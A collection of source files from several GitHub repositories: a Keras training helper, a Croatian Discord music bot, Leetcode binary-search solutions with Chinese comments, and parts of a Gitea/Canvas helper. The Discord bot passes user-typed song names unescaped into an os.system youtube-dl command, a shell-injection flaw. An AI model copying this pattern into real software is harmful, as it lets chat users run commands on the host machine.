"139169034a30d870beacfdd96bd9a2a163d41da0", "content_id": "f30de19a2f6712469c9da6f63e0b1320317847f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/paced_transfer/utils_training.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\n\nfrom keras import optimizers\nfrom keras.utils import multi_gpu_model\n\n\ndef _set_trainable_layers(model, start_layer):\n for i, layer in enumerate(model.layers):\n if i < start_layer:\n layer.trainable = False\n else:\n layer.trainable = True\n\n\ndef _pprint(content):\n if content.startswith(\"T\") or content.startswith(\"N\"):\n print content\n\n\ndef _batch_cvt(batch_data):\n imgs 
= []\n for data in batch_data:\n img = np.squeeze(data)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n imgs.append(img)\n imgs = np.array(imgs, dtype=np.float32)\n return imgs\n" } ]
35
markov73/Bot-za-discord
https://github.com/markov73/Bot-za-discord
378922059c983f869ce8ad0a151a98a042f4e883
08f845dbc20832de141c86c7cfae81c8230d9c7f
70a093a20e430817f671f74d2bf4034336288209
refs/heads/main
2023-03-20T07:08:22.445817
2021-03-17T15:00:39
2021-03-17T15:00:39
348,746,854
0
0
null
2021-03-17T14:49:40
2021-03-17T13:59:28
2021-03-17T13:59:26
null
[ { "alpha_fraction": 0.5964556932449341, "alphanum_fraction": 0.60303795337677, "avg_line_length": 28.588014602661133, "blob_id": "1de70d71d4fa4807c9236a9b041904c37f2c52c1", "content_id": "4f38801f328f65a8dfb6c5dd9030bdf8f299ce49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7900, "license_type": "no_license", "max_line_length": 128, "num_lines": 267, "path": "/bot3.py", "repo_name": "markov73/Bot-za-discord", "src_encoding": "UTF-8", "text": "# bot.py\nimport os\nimport asyncio\nimport discord\nimport urllib.request\nimport re\nimport random\nimport difflib\nimport unicodedata\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot\nfrom collections import deque\nfrom pretty_help import PrettyHelp\n\nserver = 'SERVER'\n\nsvirac = commands.Bot(command_prefix='<', help_command=PrettyHelp(no_category=\"Help\", show_index=False))\nq = deque()\nsviram = ' '\n\n#muzika s interneta\ndef download(upis):\n trazi = \"https://www.youtube.com/results?search_query=\"\n query = upis.replace(\" \", \"+\")\n trazi = trazi + query\n trazi = str(trazi.encode('utf-8').decode('ascii', 'ignore'))\n print(trazi)\n\n html = urllib.request.urlopen(trazi)\n video_ids = re.findall(r\"watch\\?v=(\\S{11})\", html.read().decode())\n rezultat = \"https://www.youtube.com/watch?v=\" + video_ids[0]\n\n naredba = 'youtube-dl -x --audio-format mp3 --output \"/home/jakov/Documents/muzickibot/muzika/' + upis + '.mp3\" ' + rezultat\n\n os.system(naredba)\n print('Skinuto je')\n\n#lista\ndef muzika(vc):\n global q\n global sviram\n\n if len(q) > 0 and not vc.is_playing():\n sviram = q.popleft()\n pesma = sviram + \".mp3\"\n pesma = '/home/jakov/Documents/muzickibot/muzika/' + pesma\n print('Trebal bi svirati ' + pesma + ' ' + str(len(pesma)))\n vc.play(discord.FFmpegOpusAudio(pesma), after=lambda m: muzika(vc))\n\n return\n\n#spajanje na server\[email protected]\nasync def on_ready():\n for guild in svirac.guilds:\n if guild.name == server:\n break\n print(\n f'{svirac.user} is connected to the following guild:\\n'\n f'{guild.name}(id: {guild.id})'\n )\n\n#muzika s kompa\[email protected](name='sviraj', help='svira muziku s kompjutera')\nasync def sviraj(ctx, *ime):\n channel = ctx.message.author.voice.channel\n try: await channel.connect()\n except:\n vc = ctx.voice_client\n print('Already connected.')\n if vc.is_playing():\n await ctx.send('Sviram pesmu ' + sviram)\n\n fajlq = ime[0]\n duljina = len(ime)\n for x in range(1,duljina):\n fajlq = fajlq + ' ' + ime[x]\n\n pesma = fajlq + \".mp3\"\n #fajl postoji\n if os.path.exists('/home/jakov/Documents/muzickibot/muzika/' + pesma):\n pesma = '/home/jakov/Documents/muzickibot/muzika/' + pesma\n q.append(fajlq)\n else:\n #fajl ne postoji\n najmanja = -1 #razlika najblizeg\n fajl = ' ' #ime najblizeg\n\n os.system('ls > popis.txt')\n file = open(\"popis.txt\", \"r\")\n\n for x in file:\n distanca = difflib.SequenceMatcher(None, pesma[:len(pesma)-4], x[:len(x)-4]).ratio()\n if(distanca > najmanja):\n najmanja = distanca\n fajl = x\n\n if najmanja > 0.65 * pow(0.995, len(fajl)-6):\n fajl = fajl[:len(fajl)-5]\n q.append(fajl)\n else:\n download(fajlq)\n await ctx.send('Skinuto je.')\n q.append(fajlq)\n\n vc = ctx.voice_client\n await ctx.send('Dodana je pesma ' + q[-1])\n\n muzika(vc)\n\n\n#pauziranje\[email protected](name='pauza', help='pauira muziku')\nasync def pauziraj(ctx):\n vc = ctx.voice_client\n try: vc.pause()\n except:\n response = 'Vec je pauzirano. 
Jebo ti pas mater glupu'\n await ctx.send(response)\n\n#resume\[email protected](name='nastavi', help='nastavlja muziku nakon pauziranja')\nasync def nastavak(ctx):\n vc = ctx.voice_client\n try: vc.resume()\n except:\n response = 'Nikaj je ne pauzirano. Naj me jebati'\n await ctx.send(response)\n\n#skip\[email protected](name='skip', help='preskace trenutni track')\nasync def skip(ctx):\n vc = ctx.voice_client\n try: vc.stop()\n except:\n response = 'Nist ne sviram'\n await ctx.send(response)\n\n#remove from queue\[email protected](name='remove', help='brise pesmu sa kjua (index obavezan)')\nasync def remove(ctx, *imena):\n upis = imena[0]\n for x in range(1,len(imena)):\n upis = upis + ' ' + imena[x]\n try:\n q.remove(upis)\n response = 'Maknul sam pesmu ' + upis\n await ctx.send(response)\n except:\n response = 'Nema pesme na tom mestu u kjuu'\n await ctx.send(response)\n\n#disconnect\[email protected](name='disconnect', help='diskonektuje sa servera')\nasync def disconnect(ctx):\n try:\n kanal = ctx.voice_client.channel\n await ctx.voice_client.disconnect()\n except:\n await ctx.send('Nisam spojen. Koji ti je kurac?')\n\[email protected](name='lista', help='ispisuje kaj je na listi')\nasync def lista(ctx):\n response = ''\n for x in range(0,len(q)):\n response = response + str(x+1) + \" \" + q[x] + '\\n'\n embed = discord.Embed(title=\"Kju pesama\", description=response, color=discord.Color.red())\n await ctx.send(embed=embed)\n\n\[email protected](name='miks', help='shuffle')\nasync def miks(ctx):\n global q\n random.shuffle(q)\n\[email protected](name='clear', help='klira kju')\nasync def klir(ctx):\n global q\n q.clear()\n vc = ctx.voice_client\n try: vc.stop()\n except:\n response = 'Nist ne sviram'\n await ctx.send(response)\n\[email protected](name='popis', help='ispisuje popis mogucih pesama')\nasync def popis(ctx, slovo):\n os.system('ls > popis.txt')\n file = open(\"/home/jakov/Documents/muzickibot/muzika/popis.txt\", \"r\")\n ispis = ''\n for x in file:\n if x[0] == slovo.lower() or x[0] == slovo.upper():\n ispis = ispis + x + '\\n'\n\n embed = discord.Embed(title=\"Popis pesama\", description=ispis, color=discord.Color.blue())\n await ctx.send(embed=embed)\n\[email protected](name='download', help='skida pesmu s interneta')\nasync def skini(ctx, *upis):\n pjesma = upis[0]\n for x in range(1,len(upis)):\n pjesma = pjesma + ' ' + upis[x]\n download(pjesma)\n await ctx.send('Skinuto je.')\n\[email protected](name='now', help='ispisuje trenutnu pesmu')\nasync def now(ctx):\n vc = ctx.voice_client\n if vc.is_playing():\n await ctx.send('Sviram pesmu ' + sviram)\n else:\n await ctx.send('Ne sviram nikaj. 
Koji ti je kurac?')\n\[email protected](name='ladd', help='stavlja pesmu na odabranu playlistu (upisite ime liste pa zatim ime pesme)')\nasync def ladd(ctx, list, *args):\n upis = args[0]\n for x in range(1, len(args)):\n upis = upis + ' ' + args[x]\n\n fajl2 = open(list + \".txt\", \"a+\")\n\n if os.path.exists('/home/jakov/Documents/muzickibot/muzika/' + upis + \".mp3\"):\n pesma = '/home/jakov/Documents/muzickibot/muzika/' + upis + \".mp3\"\n fajl2.write(upis + \"\\n\")\n await ctx.send('Stavljena je pesma ' + upis + ' na listu ' + list)\n else:\n #fajl ne postoji\n najmanja = -1 #razlika najblizeg\n fajl = ' ' #ime najblizeg\n\n os.system('ls > popis.txt')\n file = open(\"popis.txt\", \"r\")\n\n for x in file:\n distanca = difflib.SequenceMatcher(None, upis, x[:len(x)-4]).ratio()\n if(distanca > najmanja):\n najmanja = distanca\n fajl = x\n\n if najmanja > 0.65 * pow(0.995, len(fajl)-6):\n fajl = fajl[:len(fajl)-5]\n fajl2.write(fajl + \"\\n\")\n await ctx.send('Stavljena je pesma ' + fajl + ' na listu ' + list)\n else:\n download(upis)\n await ctx.send('Skinuto je.')\n fajl2.write(upis + \"\\n\")\n await ctx.send('Stavljena je pesma ' + upis + ' na listu ' + list)\n\[email protected](name='lplay', help='stavlja odabranu listu na kju')\nasync def lplay(ctx, list):\n channel = ctx.message.author.voice.channel\n try: await channel.connect()\n except:\n vc = ctx.voice_client\n print('Already connected.')\n if vc.is_playing():\n await ctx.send('Sviram pesmu ' + sviram)\n\n fajl = open(list + \".txt\", \"r\")\n for x in fajl:\n q.append(x[:len(x)-1])\n\n vc = ctx.voice_client\n muzika(vc)\n\nsvirac.run('TOKEN')\n" }, { "alpha_fraction": 0.7898832559585571, "alphanum_fraction": 0.7937743067741394, "avg_line_length": 72.42857360839844, "blob_id": "55abd4eb56d8e738c4f3bb383be85c1be06d152a", "content_id": "39281b6497be71a2dfa51eb2bf86c56e6d7443f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 520, "license_type": "no_license", "max_line_length": 170, "num_lines": 7, "path": "/README.md", "repo_name": "markov73/Bot-za-discord", "src_encoding": "UTF-8", "text": "# Bot-za-discord \n- jednostavni kod za bot koji pušta muziku \n- na početku se stavi ime servera i na kraju token bota s discordove stranice \n- u funkciji def muzika(vc) mozete prilagoditi put do mp3 datoteka \n- trebate instalirati sve što je importano u kodu + youtube-dl aplikaciju za terminal (ukoliko koristite naredbu 'download') \n- bot3.py je eksperimentalna verzija bota koja pokusava prepoznati greske u upisu i automatski downloadati pjesmu ako pokušavate pustiti nešto što nije u mapi s pesmama \\\nSretno!\n" }, { "alpha_fraction": 0.6234534978866577, "alphanum_fraction": 0.6272189617156982, "avg_line_length": 27.454082489013672, "blob_id": "f8dc0765ed22c74d07bcc9cd10eb0a73c72ef81e", "content_id": "6c365f2d03c49453ef53118fa6d567340e9d4289", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5577, "license_type": "no_license", "max_line_length": 104, "num_lines": 196, "path": "/bot2.py", "repo_name": "markov73/Bot-za-discord", "src_encoding": "UTF-8", "text": "# bot.py\nimport os\nimport time\nimport asyncio\nimport discord\nimport urllib.request\nimport re\nimport random\nfrom tube_dl import Youtube\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot\nfrom collections import deque\nfrom pretty_help import PrettyHelp\n\nserver = 'Drugovi'\n\nsvirac = commands.Bot(command_prefix='b', 
help_command=PrettyHelp(no_category=\"Help\", show_index=False))\nq = deque()\nsviram = ' '\n\n#queue\ndef muzika(vc):\n global q\n global sviram\n\n if len(q) > 0 and not vc.is_playing():\n try:\n sviram = q.popleft()\n pesma = \"/home/jakov/Documents/muzickibot/muzika/\" + sviram #uredite put do mp3 fajlova\n pesma = pesma + \".mp3\"\n print('Trebal bi svirati ' + pesma)\n vc.play(discord.FFmpegOpusAudio(pesma), after=lambda m: muzika(vc))\n except:\n print('Kju je prazan!')\n return\n return \n\n#spajanje na server\[email protected]\nasync def on_ready():\n for guild in svirac.guilds:\n if guild.name == server:\n break\n print(\n f'{svirac.user} is connected to the following guild:\\n'\n f'{guild.name}(id: {guild.id})'\n )\n\n#muzika s kompa\[email protected](name='sviraj', help='svira muziku s kompjutera')\nasync def sviraj(ctx, *ime):\n channel = ctx.message.author.voice.channel\n try: await channel.connect()\n except:\n print('Already connected.')\n await ctx.send('Sviram pesmu ' + sviram)\n\n# fajl = \"/home/jakov/Documents/muzickibot/muzika/\"\n fajl = ime[0]\n duljina = len(ime)\n for x in range(1,duljina):\n fajl = fajl + ' ' + ime[x]\n# fajl = fajl + \".mp3\"\n\n q.append(fajl)\n print(fajl)\n await ctx.send('Dodana je pesma ' + fajl)\n vc = ctx.voice_client\n try: muzika(vc)\n except: print('Vec nekaj sviram.')\n\n# response = 'Sviram ' + fajl\n\n# vc = ctx.voice_client\n# vc.play(discord.FFmpegPCMAudio(fajl)\n# ctx.send(response)\n\n#muzika s interneta\[email protected](name='download', help='skida muziku s interneta')\nasync def download(ctx, *query):\n trazi = \"https://www.youtube.com/results?search_query=\"\n trazi = trazi + query[0]\n for x in range(1, len(query)):\n trazi = trazi + '+' + query[x]\n print(trazi)\n html = urllib.request.urlopen(trazi)\n video_ids = re.findall(r\"watch\\?v=(\\S{11})\", html.read().decode())\n rezultat = \"https://www.youtube.com/watch?v=\" + video_ids[0]\n\n channel = ctx.message.author.voice.channel\n try: await channel.connect()\n except:\n print('Already connected.')\n await ctx.send('Sviram pesmu ' + sviram)\n\n upis = query[0]\n for i in range(1,len(query)):\n if i == len(query): upis = upis + query[i]\n else: upis = upis + \" \" + query[i]\n naredba = 'youtube-dl -x --audio-format mp3 --output \"' + upis + '.mp3\" ' + rezultat\n os.system(naredba)\n await ctx.send('Skinuto je')\n\n #sviranje\n q.append(upis)\n print(upis)\n await ctx.send('Dodana je pesma ' + upis)\n vc = ctx.voice_client\n try: muzika(vc)\n except: print('Vec nekaj sviram.')\n\n\n#pauziranje\[email protected](name='pauza', help='pauira muziku')\nasync def pauziraj(ctx):\n vc = ctx.voice_client\n try: vc.pause()\n except:\n response = 'Vec je pauzirano. Jebo ti pas mater glupu'\n await ctx.send(response)\n\n#resume\[email protected](name='nastavi', help='nastavlja muziku nakon pauziranja')\nasync def nastavak(ctx):\n vc = ctx.voice_client\n try: vc.resume()\n except:\n response = 'Nikaj je ne pauzirano. 
Naj me jebati'\n await ctx.send(response)\n\n#skip\[email protected](name='skip', help='preskace trenutni track')\nasync def skip(ctx):\n vc = ctx.voice_client\n try: vc.stop()\n except:\n response = 'Nist ne sviram'\n await ctx.send(response)\n\n#remove from queue\[email protected](name='remove', help='brise pesmu sa kjua (index obavezan)')\nasync def remove(ctx, *imena):\n upis = imena[0]\n for x in range(1,len(imena)):\n upis = upis + ' ' + imena[x]\n try:\n q.remove(upis)\n except:\n response = 'Nema pesme na tom mestu u kjuu'\n await ctx.send(response)\n\n#disconnect\[email protected](name='disconnect', help='diskonektuje sa servera')\nasync def disconnect(ctx):\n try:\n kanal = ctx.voice_client.channel\n await ctx.voice_client.disconnect()\n except:\n await ctx.send('Nisam spojen. Koji ti je kurac?')\n \[email protected](name='lista', help='ispisuje kaj je na listi')\nasync def lista(ctx):\n response = ''\n for x in range(0,len(q)):\n response = response + str(x+1) + \" \" + q[x] + '\\n'\n embed = discord.Embed(title=\"Kju pesama\", description=response, color=discord.Color.red())\n await ctx.send(embed=embed)\n\[email protected](name='miks', help='shuffle')\nasync def miks(ctx):\n global q\n random.shuffle(q)\n\[email protected](name='clear', help='klira kju')\nasync def klir(ctx):\n global q\n q.clear()\n vc = ctx.voice_client\n try: vc.stop()\n except:\n response = 'Nist ne sviram'\n await ctx.send(response)\n \[email protected](name='popis', help='ispisuje popis mogucih pesama')\nasync def popis(ctx, slovo):\n os.system('ls > popis.txt')\n file = open(\"/home/jakov/Documents/muzickibot/muzika/popis.txt\", \"r\")\n ispis = ''\n for x in file:\n if x[0] == slovo.lower() or x[0] == slovo.upper():\n ispis = ispis + x + '\\n'\n\n embed = discord.Embed(title=\"Popis pesama\", description=ispis, color=discord.Color.blue())\n await ctx.send(embed=embed)\n\nsvirac.run('BOT_TOKEN') #dodaj svoj token\n" } ]
3
runhugo/Leetcode
https://github.com/runhugo/Leetcode
ad965867427e896616b7cc324533b6135a1b6cd9
104cd872d61ca0f94bed9e38f8fa75f3bb213d22
95d4f4475903fd58abb0f2e58c791078dccf1ecb
refs/heads/main
2023-02-20T04:03:17.158189
2021-01-22T10:51:33
2021-01-22T10:51:33
327,858,407
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7906976938247681, "alphanum_fraction": 0.7906976938247681, "avg_line_length": 20.5, "blob_id": "e21d22f95b0ca8766a8649aecbd2dbfcd728108b", "content_id": "6ff4a99faec6216c0dc2df8f1fab114f67b5f250", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 43, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/README.md", "repo_name": "runhugo/Leetcode", "src_encoding": "UTF-8", "text": "# Leetcode\nTo recode the study on Leetcode\n" }, { "alpha_fraction": 0.6004343032836914, "alphanum_fraction": 0.628664493560791, "avg_line_length": 23.263158798217773, "blob_id": "f5f4bbacd4cbd4c857523c2f2a361a74d170a0a8", "content_id": "3ca7d837e3feb231e0692661b3cd24613809ae3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1415, "license_type": "no_license", "max_line_length": 84, "num_lines": 38, "path": "/binary search/35_seachInsert.py", "repo_name": "runhugo/Leetcode", "src_encoding": "UTF-8", "text": "# 给定一个排序数组和一个目标值,在数组中找到目标值,并返回其索引。\n# 如果目标值不存在于数组中,返回它将会被按顺序插入的位置。\n# 你可以假设数组中无重复元素。\n\n# Example: \n# input: [1,3,5,6], 5; output: 2\n# input: [1,3,5,6], 2; output: 1\n\n# 基本思路:(排序数组寻找目标值,用二分查找)\n#\n# 当num[mid] == target时,直接返回mid\n# 当num[mid] < target, 证明target在右半边\n# 当num[mid] > target,证明在左半边\n# 如果最后没有找到,left最终指向的位置则是插入的位置,因为:\n# 最后找不到时必定会有left==right==mid的情况,此时(在元素不重复时),target只会插在这个元素的左边或右边\n# (1)若num[mid] < target,则target应该插在右边,根据上述条件,left=mid+1\n# (2)若num[mid] > target,则target应该插在这个元素左边,此时right=mid-1,left不变(相当于元素插入到当前位置,现在的值往后移)\ndef searchInsert(nums, target):\n left = 0\n right = len(nums) - 1\n\n while left <= right:\n mid = left + (right - left) // 2\n guess = nums[mid]\n\n if guess == target:\n return mid\n\n if guess < target:\n left = mid + 1\n else:\n right = mid - 1\n return left\n\nnums = [1,5,6,9]\ntarget = 8\n\nprint(str(searchInsert(nums, target)))" }, { "alpha_fraction": 0.46912649273872375, "alphanum_fraction": 0.5075300931930542, "avg_line_length": 20.063491821289062, "blob_id": "847696351124d4a4ae0a892194d9e08017d2b38d", "content_id": "366cdeed32b3c92189d5a16d19f567a5cb12cc6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1895, "license_type": "no_license", "max_line_length": 70, "num_lines": 63, "path": "/binary search/68_mySqrt.py", "repo_name": "runhugo/Leetcode", "src_encoding": "UTF-8", "text": "# 实现 int sqrt(int x) 函数。\n# 计算并返回 x 的平方根,其中 x 是非负整数。\n# 由于返回类型是整数,结果只保留整数的部分,小数部分将被舍去。\n\n# 基本思路:\n# \b因为平方根之后的数一定在[0,x]之间(nums=[0,x]),通过二分\n# 查看mid点的数的平方是否等于x\n#(1)num[mid]*num[mid] = x,则返回num[mid]\n#(2)num[mid]*num[mid] < x,则得数在[num[mid+1],x]之间\n#(3)num[mid]*num[mid] > x,则得数在[0,num[mid-1]]之间\n# 最后结束时,right所指即x开方后的取整值\ndef mySqrt(x:int):\n if(x < 0):\n return -1\n \n left = 0\n right = x\n\n while left <= right:\n mid = left + (right - left) // 2\n sq = mid * mid\n\n if sq == x:\n return mid\n\n if sq < x:\n left = mid + 1\n else:\n right = mid - 1\n return right\n\n# 还可以用牛顿法\n# 牛顿法的介绍:https://www.matongxue.com/madocs/205/\n# \n# 基本思路:求x的平方根,其实就是求函数f(x)=x^2-a等于0时的正解\n# 通过牛顿法,可算得迭代式:x(n+1) = (x(n)^2 + a) / (2*x(n))\n# 迭代停止条件:\n# 我的思路(可行吗?代码上可行):每次算得x(n+1),带回f(x)中,当收敛于0时,则可以视为是x的平方根 (我的思路。。这个可行吗?)\n# 网站思路:当两次的迭代点足够近时,则认为收敛,找到解\ndef mySqrt_newton(x):\n if x < 0:\n return -1\n \n if x == 0:\n return 0\n \n x1 = x\n while True:\n x0 = x1\n x1 = 0.5 * (pow(x1, 2) + x) / x1\n # 我的思路可实现\n # x_hat = pow(x1, 2) - x\n # if abs(x_hat) < 1e-7:\n # return x1\n \n # 网站思路\n if 
abs(x1 - x0) < 1e-7:\n return x1 \n\n\nprint(str(mySqrt(8)))\nprint(str((mySqrt_newton(8))))\nprint(3%6)\n\n" }, { "alpha_fraction": 0.4554579555988312, "alphanum_fraction": 0.49121707677841187, "avg_line_length": 26.973684310913086, "blob_id": "2134622a6ae870297a895f6ed7d225e399034a1b", "content_id": "143d75ad7dee7c8143a0432217998e55b0cb4902", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3766, "license_type": "no_license", "max_line_length": 146, "num_lines": 114, "path": "/binary search/jzoffer_53.py", "repo_name": "runhugo/Leetcode", "src_encoding": "UTF-8", "text": "# 剑指offfer 53\n# 统计一个数字在排序数组中出现的次数\n# 输入:数组=[5, 7, 7, 8, 8, 10], target=8(target = 6)\n# ouput: 2(0)\n\nimport time\n\n# 我的思路:\n# 先找到任意一个目标数字的位置,计算一次次数\n# 然后对该位置的上、下方向分别逐个查找,找到一个次数+1,数字与目标不匹配则结束\ndef search(nums, target):\n\n start = time.time()\n count = 0\n\n low = 0\n high = len(nums) - 1\n\n while low <= high:\n mid = int((low + high) / 2)\n guess = nums[mid]\n\n if guess < target:\n low = mid + 1\n elif guess > target:\n high = mid - 1\n else:\n count = count + 1\n\n low_limit = mid\n while low_limit > 0:\n low_limit = low_limit - 1\n low_target = nums[low_limit]\n if low_target == target:\n count = count + 1\n else:\n break\n \n high_limit = mid\n while high_limit < len(nums) - 1:\n high_limit = high_limit + 1\n high_target = nums[high_limit]\n if high_target == target:\n count = count + 1\n else:\n break\n break\n stop = time.time()\n print(\"My Answer-Running time: \" + str(stop - start))\n return count\n\n# 精选答案:https://leetcode-cn.com/problems/zai-pai-xu-shu-zu-zhong-cha-zhao-shu-zi-lcof/solution/mian-shi-ti-53-i-zai-pai-xu-shu-zu-zhong-cha-zha-5/\ndef search_suggested(nums, target):\n # 以后为基本思路的优化代码\n # 帮助找到边界点\n def helper(tar):\n left, right = 0, len(nums) - 1\n while left <= right:\n mid = int((left + right) / 2)\n guess = nums[mid]\n\n if guess <= tar:\n left = mid + 1\n else:\n right = mid - 1\n return left\n\n start = time.time()\n\n # target的左边界(包含target)可以理解为找target - 1的右边界\n # 此时则可以抽象为同一个函数\n # 最后的计数则直接为right - left即可\n count = helper(target) - helper(target - 1)\n stop = time.time()\n print(\"Suggested-Running time:\" + str(stop - start))\n return count\n\n # 基本思路:\n # left = 0\n # right = len(nums) - 1\n # # 先寻找右边界(不包含target的)\n # while left <= right:\n # mid = int((left + right) / 2)\n # edge = nums[mid]\n # # 为了寻找右边界,当edge=target的时候,也要对使左边界+1\n # # 当循环条件结束达成后,右边界即为最后的left = mid+1(此时left>right)\n # if edge <= target:\n # left = mid + 1\n # else:\n # right = mid - 1\n # right_edge = left\n # # 寻找到右边界后,左边界则在[0,right]之间\n # # 在此之前,先判断有没有必要寻找左边界\n # # 先通过判断nums[right]是否等于target来判断最终的数组是否包含target\n # # 如果不等于,即不包含,则直接返回0,没有必要寻找左边界\n # if right >= 0 and nums[right] != target:\n # return 0\n # left = 0\n # while left <= right:\n # mid = int((left + right) / 2)\n # edge = nums[mid]\n # if edge < target:\n # left = mid + 1\n # else:\n # right = mid - 1\n # left_edge = right\n # count = right_edge - left_edge + 1\n \n\nnums = [5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, \n8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 10]\ntarget = 7\nprint(str(search(nums, target)))\nprint(str(search_suggested(nums, target)))" }, { "alpha_fraction": 0.6124513745307922, "alphanum_fraction": 0.6505836844444275, "avg_line_length": 31.149999618530273, "blob_id": "4dba6fb63005aac842692a4cb3d56b21b88a9e04", "content_id": "61be33afb6238937a38c830a1c26d94e2c65137f", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2275, "license_type": "no_license", "max_line_length": 86, "num_lines": 40, "path": "/binary search/jzoffer_53_ii.py", "repo_name": "runhugo/Leetcode", "src_encoding": "UTF-8", "text": "# 剑指offer 35 ii\n# 一个长度为n-1的递增排序数组中的所有数字都是唯一的,并且每个数字都在范围0~n-1之内。在范围0~n-1内的n个数字中有且只有一个数字不在该数组中,请找出这个数字。\n# input: [0,1,3], output: 2\n# input: [0,1,2,3,4,5,6,7,9], output: 8\n\n\n# 我的思路:通过二分,查看mid对应的元素,然后通过+1/-1来与mid下一个/上一个元素进行比较,\n# 如果相等,表示这几个数字连续,则不连续数字是在[left, mid-1]和[mid+1, right]之间\n# 以此类推,通过不断划分区间,并对这些区间进行二分查询,找到缺失数字\n## 但是该方法不可行,1是没有想明白跳出循环点的条件,2是问题复杂化,需要左右两边要分别查询。此外如果数组很大,而缺失数字由在极端位置,使得复杂度增加\n\n\n# 推荐思路:因为是递增有序数组,且数字都是唯一,则如果没有期间数字缺失的话,数组索引与索引对应的值应该是相等的(因为值也是从0开始)-->即num[i]=i\n# 则可以把数组分为左右两个部分(以缺失数字为分界),即寻找左数组的末尾索引和右数组的首位索引。\n# 而缺失数字则对应右数组的首位索引(即第一个num[i]!=i)。所以\n# 循环:left<=right(left = 0, right = len - 1)\n# 寻找中点:mid = left + right // 2 --> int((left + right) / 2)\n# if num[mid] == mid,则右数组的首位一定在[mid + 1, right]之中\n# if num[mid] != mid,则左数组的末位一定在[left, mid - 1]之中(即右数组首位在[left, mid]之间--可能mid刚好就是右数组首位)\ndef missingNumber(nums):\n\n left = 0\n right = len(nums) - 1\n\n while left <= right:\n # mid = (left + right) // 2\n # 当left和right都是极端大的数时,直接相加可能会导致溢出(python可能不存在这样的问题,但是java和c都有可能会)\n # 所有先做减法(right - left)可以有效避免变量溢出\n mid = left + (right - left) // 2 \n guess = nums[mid]\n\n if guess == mid:\n left = mid + 1\n else:\n right = mid - 1\n \n return left\n\nnums = [0,1,3,4,5,6,7,8,9]\nprint(missingNumber(nums))" } ]
5
makersmelx/GiteaCanvasHelper
https://github.com/makersmelx/GiteaCanvasHelper
336a4aa15c3d843f349402facf28499e4bf79c88
78f9f16193ddd9387643a97bd19b098c7515c5c9
48c7bffbb08d7409e7f2594155b2c4fbda30c169
refs/heads/master
2023-08-18T09:39:57.706151
2021-09-14T15:34:17
2021-09-14T15:34:17
294,352,665
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5870445370674133, "alphanum_fraction": 0.6194332242012024, "avg_line_length": 23.700000762939453, "blob_id": "ee953a1817aa79956ccb2a0515e89b875c48655b", "content_id": "e85406ae2f5b22df15c4eae43c8170e564ff5b76", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 247, "license_type": "permissive", "max_line_length": 56, "num_lines": 10, "path": "/loop.sh", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "if [ $1 ];then\n while((1));do\n npm start s $1 student\n python3 CreatePersonalRepo/CreatePersonalRepo $1\n echo \"Ai. Done. Sleep. Good night\"\n sleep 300\n done\nelse\n echo \"Missing one argument for course name\"\nfi\n" }, { "alpha_fraction": 0.6054104566574097, "alphanum_fraction": 0.6091417670249939, "avg_line_length": 25.14634132385254, "blob_id": "0a8010da3b25d8d241577c06fde3ebff96b89a8f", "content_id": "30174708ce73d2e0b457d4113c7a759e323a8e95", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1072, "license_type": "permissive", "max_line_length": 74, "num_lines": 41, "path": "/src/teams/addUserToTeam.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import { giteaInstance } from '../axios';\nimport { logger } from '../logger';\n\nexport const addUserToTeam = async (username, organization, teamName) => {\n const response = (await giteaInstance.get(\n `/orgs/${organization}/teams/search`, {\n params: {\n q: teamName,\n },\n }));\n const queryList = response.data.data;\n if (queryList.length === 0) {\n logger.error(`Team ${teamName} does not exist.`);\n return;\n }\n const id = queryList[0].id;\n await giteaInstance.put(`/teams/${id.toString()}/members/${username}`)\n .then((response) => {\n }, (error) => {\n logger.error(error);\n },\n );\n};\n\nexport const addUserToTeamBySJTUID = async (\n student, organization, teamName) => {\n const userList = (await (giteaInstance.get(`/users/search`, {\n params: {\n q: student.login_id,\n },\n }))).data.data;\n if (userList.length === 0) {\n return ({\n name: student.name,\n id: student.login_id,\n });\n }\n const username = userList[0].username;\n await addUserToTeam(username, organization, teamName);\n return null;\n};\n" }, { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 29.25, "blob_id": "4dc7c4fb3dfeb0a3a150c4dfb32eb79877345969", "content_id": "5ca6cfb2cfe1d61c6bd2ffd235850d9f53eee713", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 120, "license_type": "permissive", "max_line_length": 48, "num_lines": 4, "path": "/src/courses/courses.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "const fs = require('fs');\n\nconst rawData = fs.readFileSync('courses.json');\nexport const courseID = JSON.parse(rawData);" }, { 